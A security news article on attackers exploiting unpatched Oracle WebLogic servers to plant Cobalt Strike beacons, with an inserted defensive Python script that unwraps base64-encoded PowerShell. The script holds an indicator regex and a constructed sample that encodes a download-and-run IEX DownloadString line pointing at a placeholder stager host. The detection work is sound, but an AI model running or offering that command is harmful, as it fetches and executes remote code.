Saturday, January 16, 02:01

Hackers exploit Oracle servers to deploy Cobalt Strike

Hackers are actively exploiting Oracle WebLogic servers that remain unpatched against CVE-2020-14882 to deploy Cobalt Strike beacons that allow persistent remote access to compromised devices.

Cobalt Strike is a legitimate penetration testing tool that attackers also use in post-exploitation tasks and to deploy so-called beacons, which give them persistent remote access.

This later allows them to access the compromised servers to collect data and deploy malware payloads.


Incoming ransomware attacks

The CVE-2020-14882 remote code execution (RCE) flaw was fixed by Oracle in last month's Critical Patch Update, and attackers were using it to scan for exposed WebLogic servers one week later.

Since then, a related unauthenticated RCE vulnerability tracked as CVE-2020-14750, which also allows unauthenticated takeover of unpatched instances, was addressed by a security update released last weekend.

This latest series of attacks targeting vulnerable WebLogic instances started over the weekend, as SANS ISC handler Renato Marinho revealed in an advisory.

Attackers use a chain of base64-encoded PowerShell scripts to download and install Cobalt Strike payloads on unpatched Oracle WebLogic servers.
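One way a defender might triage the encoded PowerShell chain described above (an added example, not code from the SANS ISC advisory or from this article): it decodes `-EncodedCommand` arguments found in process command-line logs and follows nested base64 layers. The sample command line, the host name and the indicator list are constructed assumptions.

```python
import base64
import re

FLAG_ARG = re.compile(r"\s-(\w+)\s+([A-Za-z0-9+/]{16,}={0,2})")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
INDICATOR = re.compile(r"(?i)\b(downloadstring|downloaddata|net\.webclient|"
                       r"invoke-webrequest|frombase64string|iex)\b")

def _decode(blob, encodings):
    """Base64-decode blob; return it as text only if it is plain ASCII script."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    for enc in encodings:
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text and all(c in "\r\n\t" or 32 <= ord(c) < 127 for c in text):
            return text
    return None

def unwrap(cmdline, max_layers=5):
    """Return the script layers hidden behind -EncodedCommand, outermost first."""
    layers = []
    for flag, blob in FLAG_ARG.findall(cmdline):
        # PowerShell accepts prefixes of -EncodedCommand (-e, -enc) and the alias -ec.
        if "encodedcommand".startswith(flag.lower()) or flag.lower() == "ec":
            text = _decode(blob, ("utf-16-le",))  # this flag takes UTF-16LE text
            if text:
                layers.append(text)
    for layer in layers:  # the list grows while iterating, so inner layers are scanned too
        for blob in B64_RUN.findall(layer):
            text = _decode(blob, ("utf-16-le", "utf-8"))
            if text and len(layers) < max_layers:
                layers.append(text)
    return layers

def triage(cmdline):
    """Return (layer number, sorted indicators found) for every decoded layer."""
    return [(n, sorted({m.lower() for m in INDICATOR.findall(layer)}))
            for n, layer in enumerate(unwrap(cmdline), 1)]

# Constructed two-layer sample (not taken from the advisory); the host is a placeholder.
_inner = "IEX (New-Object Net.WebClient).DownloadString('http://stager.example.invalid/a')"
_outer = ("$s=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
          + base64.b64encode(_inner.encode()).decode() + "'));IEX $s")
SAMPLE = ("powershell.exe -nop -w hidden -enc "
          + base64.b64encode(_outer.encode("utf-16-le")).decode())
```

Running `triage` over command lines from process-creation logs surfaces the download step even when it sits one or more encoding layers below what the log line shows.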


Administrators urged to patch systems immediately

As both CVE-2020-14882 and CVE-2020-14750 can be easily exploited by unauthenticated attackers to take over vulnerable WebLogic servers, Oracle advises companies to apply the security updates immediately to block these attacks.

"Because of the seriousness of this vulnerability, Oracle recommends that customers implement the updates provided by this Security Alert as soon as possible after the implementation of the Critical Patch Update of October 2020," the company said in the weekend advisory.

CISA also urged administrators to apply the security update as soon as possible to address the two critical vulnerabilities.
